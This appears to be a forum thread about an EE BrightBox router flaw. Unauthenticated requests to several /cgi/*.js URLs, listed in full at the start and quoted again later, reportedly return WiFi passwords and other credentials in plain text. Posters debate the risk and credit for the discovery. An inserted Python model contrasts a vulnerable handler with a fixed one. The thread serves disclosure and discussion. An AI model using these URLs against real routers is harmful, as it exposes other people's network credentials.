I put these URLs into a browser on a machine in my network... a machine that has NEVER connected to the router pages... and it gives up PLAIN TEXT security data... try them yourselves.
The machine was not even logged in on the router!
Browser: "Give me all your security credentials"
Router: "Oh, okay!"
http://192.168.1.1/cgi/cgi_status.js?t=1381432913046
http://192.168.1.1/cgi/cgi_wifi_wpa.js?t=1381433787099
http://192.168.1.1/cgi/cgi_atmint.js?t=1381434119553
http://192.168.1.1/cgi/cgi_status.js?t=1381434119550
http://192.168.1.1/cgi/cgi_security_log.js?t=1381434403382
http://192.168.1.1/cgi/cgi_wireless_wps.js?t=1381434403382
Edited by glossywhite (Thu 10-Oct-13 21:04:52)
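As an added illustration of the flaw described above (this is a toy model, not the BrightBox firmware or any code from the thread), here is a router web handler that serves its config "JS" files to any LAN client, alongside a hardened version that checks for a login session before touching those files. The endpoint paths are the ones listed above; the session store, cookie name and file contents are constructed assumptions.

```python
from dataclasses import dataclass, field

# Endpoints the thread shows returning credentials/config without a login.
SENSITIVE = {
    "/cgi/cgi_status.js", "/cgi/cgi_wifi_wpa.js", "/cgi/cgi_atmint.js",
    "/cgi/cgi_security_log.js", "/cgi/cgi_wireless_wps.js",
}
# Constructed stand-ins for what those files carried (not real values).
CONFIG = {
    "/cgi/cgi_wifi_wpa.js": "var wpa_psk = 'CONSTRUCTED-PSK';",
    "/cgi/cgi_status.js": "var uptime = 4242;",
}

@dataclass
class Request:
    path: str                                   # may carry ?t=<cache-buster>
    cookies: dict = field(default_factory=dict)

@dataclass
class RouterWeb:
    sessions: set = field(default_factory=set)  # ids issued after a login

    @staticmethod
    def _file(path):
        return path.split("?", 1)[0]            # drop ?t=... before lookup

    def vulnerable(self, req):
        # Flaw: the file is served to any LAN client, logged in or not.
        body = CONFIG.get(self._file(req.path))
        return (200, body) if body is not None else (404, "")

    def hardened(self, req):
        # Fix: sensitive files need a valid session before any lookup.
        path = self._file(req.path)
        if path in SENSITIVE and req.cookies.get("sid") not in self.sessions:
            return (401, "")
        body = CONFIG.get(path)
        return (200, body) if body is not None else (404, "")

def demo():
    # Same request (one anonymous, one logged in) against both handlers.
    web = RouterWeb(sessions={"s1"})
    anon = Request("/cgi/cgi_wifi_wpa.js?t=1381433787099")
    user = Request("/cgi/cgi_wifi_wpa.js?t=1381433787099", {"sid": "s1"})
    return {
        "vuln_anon": web.vulnerable(anon)[0],   # 200: PSK handed out
        "hard_anon": web.hardened(anon)[0],     # 401: refused
        "hard_user": web.hardened(user)[0],     # 200: only after login
    }
```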
Does this leak occur externally?
Yes, script failure on IE8 but works on FF24.
Does it matter that someone on my network who is able to spend ages generating random #s can eventually see my 3 passwords, cuz that's all that's secret that's revealed?
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 20 Meg WBC
Yes, script failure on IE8 but works on FF24.
Does it matter that someone on my network who is able to spend ages generating random #s can eventually see my 3 passwords, cuz that's all that's secret that's revealed?
If you were a guest on one of the virtual networks (which could be left open), I'd have to suppose that, yes - it would matter a LOT.
[Update]
Just connected to my OPEN virtual WiFi on the Bright Box, and it hands over the info no questions asked. So, someone just has to connect to your open virtual network, inject the URL, and... WHOOPS! - they can now join ANY of your wireless networks, and view all your shares.
Seems like an issue to me.
Edited by glossywhite (Fri 11-Oct-13 19:41:45)
What virtual networks might I have & how might they be left open?
As far as I know I only use the router in a normal way and only have SSID1 & VLAN1 enabled, if that's what you are talking about.
To issue any of these commands the intruder will first have to connect to the router and pass its authentication. Chicken & egg!
And if he could do that then he could just as well access all this info thro' its standard GUI without needing these arcane commands.
What virtual networks might I have & how might they be left open?
As far as I know I only use the router in a normal way and only have SSID1 & VLAN1 enabled, if that's what you are talking about.
If a case study was carried out about Bright Box routers and their usage, and you were the sole participant, then that would be acceptable I suppose, but you're not. It's a security flaw - anyone can see that.
Think outside of your own personal situation, and realise that people DO use these features - I for one, use them - if people do not use them, why are they there? I have friends who own shops who provide a WiFi segment for customers, open, and their own protected network for their own use.
Phrase it however you wish - a flaw is a flaw, and it's a demonstrable one too.
Edited by glossywhite (Fri 11-Oct-13 20:05:06)
I'm simply asking you a Q of your superior knowledge of routers. I was never implying that I was a representative user; simply enquiring how this flaw you identified might affect me.
If you are not prepared to answer then so be it! It would seem to be unimportant.
There was no need for your sarcasm and condescension.
I'm simply asking you a Q of your superior knowledge of routers. I was never implying that I was a representative user; simply enquiring how this flaw you identified might affect me.
If you are not prepared to answer then so be it! It would seem to be unimportant.
There was no need for your sarcasm and condescension.
I did not intend to be patronising, sorry.
Look - the flaw is the flaw, and it's there - you can decide how it impacts you, with reasoning and common sense, not me. I'm not a personal IT consultant - it's obvious, is it not, that if you perceive no issue, then you perceive no risk; the fact that it is present is obvious and has been shown. That's all that can be said, really.
Edited by glossywhite (Fri 11-Oct-13 20:34:00)
It takes 2 to tango!
In this case I contend that it is your issue by not being prepared to answer a simple reasonable Q. I have claimed no 'rights' in this thread; only Qs.
Here ends the lesson!
It takes 2 to tango!
In this case I contend that it is your issue by not being prepared to answer a simple reasonable Q. I have claimed no 'rights' in this thread; only Qs.
Here ends the lesson!
Have a nice night - there's more to life than routers and being right.
Just connected to my OPEN virtual WiFi on the Bright Box, and it hands over the info no questions asked.
Not surprising if you leave an unauthenticated SSID (I don't see how 'virtual' comes into it). You don't even need to inject these special URLs!
there's more to life than routers
Too true! Funny how all your posts have been about them; indeed just the BrightBox.
there's more to life than routers
Too true! Funny how all your posts have been about them; indeed just the BrightBox.
You don't let up, do you.
Even a fool appears wise when he says nothing; surely saying nothing is better than causing hard feeling just because you can't NOT say something?
I'm sure you're much too clever to make "smart" comments, the only purpose of which is to cause annoyance and offence - this is not the first time you have been needlessly pedantic and know-it-all to me - I'd urge you to stop - you don't exactly endear people to you, making them WANT to communicate.
Edited by glossywhite (Fri 11-Oct-13 21:57:51)
Hi glossywhite,
I've sent you a PM; if you get a chance to pick it up and respond, that would be great.
Scott.
PS: Amazing things, firmware upgrades, because even router designers are human.
I tried to tell you last year how rubbish these routers are, but you insisted it was the most amazing piece of networking equipment ever produced.
Zen 8000 Pro
Edited by Pipexer (Wed 08-Jan-14 21:10:11)
I put these URLs into a browser on a machine in my network... a machine that has NEVER connected to the router pages... and it gives up PLAIN TEXT security data... try them yourselves.
The machine was not even logged in on the router!
Browser: "Give me all your security credentials"
Router: "Oh, okay!"
http://192.168.1.1/cgi/cgi_status.js?t=1381432913046
http://192.168.1.1/cgi/cgi_wifi_wpa.js?t=1381433787099
http://192.168.1.1/cgi/cgi_atmint.js?t=1381434119553
http://192.168.1.1/cgi/cgi_status.js?t=1381434119550
http://192.168.1.1/cgi/cgi_security_log.js?t=1381434403382
http://192.168.1.1/cgi/cgi_wireless_wps.js?t=1381434403382
Whether I use the router default gateway IP address 192.168.1.1 or my own chosen gateway IP address 192.168.XX.XXX, none of those URL addresses work with my Bright Box 1 router; all I get is a Microsoft JScript runtime error.
Using Windows 7 Pro with Internet Explorer 11
Edited by deleted (Thu 09-Jan-14 12:19:21)
all I get is Microsoft JScript runtime error.
As I pointed out ages ago, yes they fail on IE, but they work in FF.
I thought you'd be interested in an article I've just written about the EE BrightBox.
It seems the security of the device is worse than it appears, allowing an attacker to bypass the admin login, exploit the device remotely and even take control of your EE account by leaking credentials.
You can see the article on my blog here: http://scotthel.me/eebb
Scott.
I thought you'd be interested in an article I've just written about the EE BrightBox.
It seems the security of the device is worse than it appears, allowing an attacker to bypass the admin login, exploit the device remotely and even take control of your EE account by leaking credentials.
You can see the article on my blog here: http://scotthel.me/eebb
Scott.
Hello Scott
That's a nice article; FAR more research than I could be bothered to do over such a poor device. I'm now moving back to electronics as the majority of my work - I'm a hardware guy more - I have been since I was a child - software just frustrates me and confuses me.
LOVE the shotgun - that's the best thing for this piece of hardware - I have SIX spares, all brand new, and do you think EE will listen to me, and send me a BB 2? Nope - they just stonewall me. Poor show.
Great article!
God bless you,
Matt.
Hey Matt,
Yeah, it is bad that they're still shipping these things out and considering how long they have been aware of this and not patched it, well, unbelievable.
I've been trying to get a BB 2 also, let me know if you have any joy and how you get one.
Cheers,
Scott.
Well done, Scott, on getting it in the news!
Well done, Scott, on getting it in the news!
I thought it "wasn't an issue"?
How soon people change their minds... LOL.
Where did I say that? I just pointed out that your findings were of low risk, not Scott's. Here I was just congratulating Scott on his much more in-depth research.
You are most spiteful and defensive!
I notice the scotthelme website doesn't credit you for finding the exploited URLs.
Who originally discovered these?
Oliver.
I found the first exploited URLs using packet sniffing software and then went on to find the rest from the device itself. I used to be a firmware tester so hooking up to JTAG/serial headers on an embedded device is something I'm familiar with.
If credit were due, it would have been given!
Scott.
Thanks to Zak and Ray for the comments/links!
I found the first exploited URLs using packet sniffing software and then went on to find the rest from the device itself. I used to be a firmware tester so hooking up to JTAG/serial headers on an embedded device is something I'm familiar with.
Oh ok. I'm interested to know where glossywhite got the URLs from in October 2013, since your blog entry is dated this month. Did you publish this information elsewhere in October 2013?
Oliver.
You're not making any sense at all. Are you implying that because Unlokia published some of the URLs first that the only possible way anyone else could find them is by using his post? Seems a bit odd, but that's the impression I'm getting.
To my knowledge, I can't find anyone else that has made reference to some of the URLs I have published. That doesn't mean that should anyone else ever make any mention of them that they must have found them as a result of my work and attribute credit to me.
As I mentioned, and as detailed in my blog, my first exploration and discovery was made with Fiddler, a packet capture program.
Are you implying that because Unlokia published some of the URLs first that the only possible way anyone else could find them is by using his post?
I was just wondering who was the first person to discover the exploited URLs, that is all.
Oliver.
Well Unlokia found some first and I found others first. For all we know, someone else could have found them in 2012 and not published it on the Internet. They could have found it 'first' and we'd never know.
It's not really about "who found what first"; I only came across Unlokia's work once I started putting the file names I'd found into Google. It's about giving credit where credit is due. If someone makes mention of the additional things I have found, but they found them through their own research, or potentially even a different method altogether, I'm not going to jump up and down and demand credit simply because I published the file name 'first'.
Well, you managed to make EE & BBC to sit up and take note which is more than Unlokia ever did, and it strikes me that you employ a much more scientific and methodical approach.
It was just luck that it got picked up by a few news outlets and kind of worked its way up from the smaller ones all the way to the BBC. Thanks for the comments.
Well, you managed to make EE & BBC to sit up and take note which is more than Unlokia ever did, and it strikes me that you employ a much more scientific and methodical approach.
I'd say Scott has done more than any of us have done, including me, especially since it was posted back in October; there was nothing stopping anyone else reporting it, hey.
I'm not into software as my career; this was a side-line "pet" project which I became bored with and lost interest in. I didn't owe the world a thing, and know it, so I dropped it - that's what happens in life - I don't feel a need to defend it.
Listen folks, I'm not at all concerned who found what first; I am extremely pleased for Scott that he has managed to get this publicly ack'd and has made EE take some steps to "fixing" (hmm) their useless routers.
Do we really need to pick and bicker over "who found it first?" - that's what 7 year olds do in the playground, not responsible adults. I am actually very happy that Scott has taken all this time out of his life to make this research available. I don't feel the need to question his integrity about ANYTHING - if he says he was unaware of my links/info from last October, then I completely believe him - that's the end of it, no more silliness please.
Scott, you're a very good bloke mate - God bless you, and thanks for the correspondence. I am moving away from firmware and software now, and massively focussing on my primary love - electronics!
I'd love to help, but I am otherwise occupied for now. I do not expect any "crediting", as you said - ANYONE with a little patience could have found this info. These kinds of petty squabbles with people possibly twice my age are why I don't frequent this forum very much; I simply don't have the desire to have strangers rant and steal my joy - I'm a happy person, and I'm not going to give people reasons to deride me - you don't know me, and you may think what you will; I cannot stop you thinking it, but it won't affect who I AM - God decided that, not you.
Take care all, and Scott - especially to you - I'll gladly help hardware-wise if I can with photos etc, but no promises on timescale... could be many months.
Adios, and God bless you all.
Matt.
Edited by glossywhite (Tue 21-Jan-14 21:12:31)
there was nothing stopping anyone else reporting it, hey
As you addressed one of my posts, I see I need to put you right on one of your misconceptions.
Not all of us are hardware geeks like yourself. I only claim to be a software geek focusing on logical & analytical methods. As you yourself said, you are not into software; likewise me with hardware.
Many times you have brought a hardware project to the table here and when I have asked you Qs on it, as your tabling of it entitles me, you have told me to go away and do it myself. Now I hope you can see why that was inappropriate.
So, yes, what Scott & yourself did is well beyond my capabilities and I was congratulating Scott on his thorough approach.